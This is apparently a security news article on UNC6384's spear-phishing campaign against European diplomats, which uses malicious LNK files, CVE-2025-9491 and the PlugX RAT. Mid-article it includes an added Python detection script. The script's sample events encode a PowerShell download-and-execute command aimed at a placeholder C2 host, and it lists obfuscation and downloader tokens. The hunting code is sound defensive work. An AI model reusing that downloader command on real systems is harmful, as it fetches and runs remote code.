UNC6384 Uses a Windows Exploit to Target European Diplomatic Bodies


The spear-phishing campaign tricks diplomatic staff into visiting malicious websites using fake lures themed around NATO and the European Commission.

Since September, European diplomatic institutions in Hungary and Belgium have been the subject of a cyber-espionage campaign by UNC6384, a threat actor with ties to China.

In addition to exploiting the high-severity Windows vulnerability CVE-2025-9491, the group used what Arctic Wolf researchers are calling “refined social engineering” in their attacks.

According to the researchers, the group's readiness to leverage a publicly known vulnerability that several nation-state actors have already exploited extensively shows its confidence in succeeding despite greater defender awareness.


The attack chain begins with spear-phishing emails containing a URL that ultimately delivers malicious LNK files. These files are crafted to mimic invitations to European Commission meetings, NATO-related workshops, and diplomatic gatherings, with realistic details intended to entice the target.

The LNK files exploit a Windows vulnerability before running obfuscated PowerShell commands that start the infection chain, which ultimately deploys the PlugX remote access Trojan (RAT).
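A defender reading the chain above (a double-clicked LNK launching obfuscated PowerShell) will want a concrete hunt for it in process-creation telemetry. The following is an added example, not code from the article or from Arctic Wolf's report: it parses Sysmon-style process-creation events (constructed sample lines, not real telemetry from the campaign), decodes any `-EncodedCommand` payload, and flags PowerShell that is spawned by explorer.exe and carries encoded or suspicious arguments. The field layout, token list and the `c2.example.invalid` hostname are assumptions for the demonstration.

```python
"""
Hunt for the LNK -> obfuscated PowerShell pattern in process-creation logs.

Added example (not the article's or the report's code). Events are
constructed Sysmon Event ID 1-style records flattened to key=value pairs.
"""
import base64
import re
from typing import List, Optional, Tuple

# Strings that commonly appear in downloader / obfuscated PowerShell launches.
# Order matters only for the order in which hits are reported.
SUSPICIOUS_TOKENS = (
    "IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
    "FromBase64String", "-w hidden", "-windowstyle hidden", "bypass",
)

# Matches -e / -ec / -enc / -EncodedCommand (case-insensitive) followed by base64.
_ENC_RE = re.compile(r"(?i)[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")

# Constructed stage-one payload, UTF-16LE + base64 as PowerShell expects it.
# The hostname is a placeholder (.invalid TLD), not an indicator from the report.
_ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage')"
    .encode("utf-16le")
).decode("ascii")

# Constructed sample events. Index 1 and 3 model the LNK-launched pattern.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=powershell.exe -File C:\\Scripts\\backup.ps1",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=powershell.exe -nop -w hidden -enc " + _ENCODED_PAYLOAD,
    "Image=C:\\Windows\\System32\\cmd.exe|"
    "ParentImage=C:\\Windows\\System32\\services.exe|"
    "CommandLine=cmd.exe /c whoami",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
    "-File C:\\Users\\Public\\update.ps1",
]


def parse_event(line: str) -> dict:
    """Split a 'k=v|k=v' record into a dict (first '=' separates key and value)."""
    return dict(field.split("=", 1) for field in line.split("|"))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand text, or None if absent or malformed."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict) -> List[str]:
    """List the reasons a PowerShell launch resembles the LNK-delivered chain."""
    reasons: List[str] = []
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return reasons                       # only PowerShell launches are scored
    if event.get("ParentImage", "").lower().endswith("explorer.exe"):
        reasons.append("spawned by explorer.exe (typical of a double-clicked LNK)")
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command present")
    # Inspect both the raw command line and the decoded payload for known tokens.
    haystack = (cmd + " " + (decoded or "")).lower()
    hits = [t for t in SUSPICIOUS_TOKENS if t.lower() in haystack]
    if hits:
        reasons.append("suspicious tokens: " + ", ".join(hits))
    return reasons


def hunt(lines: List[str], min_reasons: int = 2) -> List[Tuple[int, List[str]]]:
    """Return (index, reasons) for events with at least `min_reasons` indicators."""
    results = []
    for i, line in enumerate(lines):
        reasons = score_event(parse_event(line))
        if len(reasons) >= min_reasons:
            results.append((i, reasons))
    return results


if __name__ == "__main__":
    for idx, why in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(why))
```

Requiring two independent indicators keeps a plain `explorer.exe -> powershell.exe -File script.ps1` launch (event 0) out of the results while still catching the non-encoded but hidden-window, policy-bypass variant (event 3), so the rule is not defeated simply by dropping `-enc`.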

Arctic Wolf researchers say the campaign is spreading to government agencies in Serbia and the wider European diplomatic community, including Italy and the Netherlands. In the past, UNC6384 has targeted embassies in Southeast Asia.

The researchers note that PlugX malware variants are a preferred tool among Chinese threat actors, and the group specializes in distributing them. First observed in 2008, PlugX provides a range of remote access features, such as keylogging, persistence establishment, and command execution. The malware, also known as Destroy RAT, SOGU, Kaba, Korplug, and TIGERPLUG, can use anti-analysis methods and anti-debugging checks to avoid detection.

At the beginning of this year, the FBI and the US Justice Department completed an operation to remove PlugX malware from thousands of devices worldwide. The operation focused on the threat groups Twill Typhoon and Mustang Panda, which used the malware to infect consumers' devices and steal data.


Users and organizations now need to put mitigation measures in place as UNC6384 continues to rapidly adapt vulnerability exploits and other techniques and to expand its targeting globally. The researchers advise organizations, particularly those in the government and diplomatic sectors, to review and block the command-and-control (C2) infrastructure listed in the report, hunt for the reported indicators across their endpoint environments, and maintain security awareness training in order to lessen the impact of such attacks.

Long-term effects like “exfiltration of classified or sensitive documents, monitoring of real-time policy discussions and decision-making processes, collection of credentials for accessing diplomatic networks and partner systems, and surveillance of diplomatic calendars and travel plans” could result if these threat actors’ attacks are successful, according to the researchers’ report.

About the Author:

Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blogs, he also writes for brands including Craw Security, Bytecode Security, and NASSCOM.
